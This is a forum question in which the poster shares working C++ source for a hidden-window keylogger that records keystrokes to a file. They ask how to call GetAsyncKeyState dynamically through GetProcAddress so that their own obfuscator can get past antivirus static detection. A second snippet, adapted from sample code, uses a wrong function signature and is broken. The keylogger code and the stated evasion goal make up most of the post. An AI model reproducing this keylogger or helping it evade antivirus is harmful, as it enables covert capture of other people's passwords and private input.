Obfuscating Function Calls C++

  antimalware, c++, obfuscation, windows

Hope you all are doing good. I’m actually working on making my own source code obfuscator and I noticed that a simple keylogger is detected by some antivirus engines if there is a function call like this in the source code. "GetASyncKeyState". Take an example of this source code which is a simple keylogger main function.

int main()
{
ShowWindow(GetConsoleWindow(), SW_HIDE);
char KEY = 'x';

while (true) {
    Sleep(10);
    for (int KEY = 8; KEY <= 190; KEY++)
    {
        if (GetAsyncKeyState(KEY) == -32767) {
            if (SpecialKeys(KEY) == false) {

                fstream LogFile;
                LogFile.open("dat.txt", fstream::app);
                if (LogFile.is_open()) {
                    LogFile << char(KEY);
                    LogFile.close();
                }

            }
        }
    }
}

return 0;
}

Now I want to obfuscate the function call of "GetAsyncKeyState" name so that no AV can detect it as a keylogger. I’m confused in the implementation of function call using ordinals and GetProcAddress. Like I have tried in the below code.

   typedef int(__cdecl *MYPROC)(LPWSTR);
   int main(void)
  {
  HINSTANCE hinstLib;
  MYPROC ProcAdd;
  BOOL fFreeResult, fRunTimeLinkSuccess = FALSE;

// Get a handle to the DLL module.

hinstLib = LoadLibrary(TEXT("user32.dll"));

// If the handle is valid, try to get the function address.

if (hinstLib != NULL)
{
    ProcAdd = (MYPROC)GetProcAddress(hinstLib, "GetAsyncKeyState");

    // If the function address is valid, call the function.

    if (NULL != ProcAdd)
    {
        fRunTimeLinkSuccess = TRUE;
        (ProcAdd)(L"Message sent to the DLL functionn Loaded Wao");
        printf("Yahooo Function Called");

    }
    // Free the DLL module.

    fFreeResult = FreeLibrary(hinstLib);
}

// If unable to call the DLL function, use an alternative.
if (!fRunTimeLinkSuccess)
    printf("Message printed from executablen Not Worked Soory");
getch();
return 0; }

This implementation is not understandable. Kindly explain this also.

I just needed the equivalent of "GetAsyncKeyState(Key)" so that my obfuscator will detect that function call and replace it with the equivalent call (Dynamically) so that I can bypass static analysis detection.
Regards

Source: Windows Questions

LEAVE A COMMENT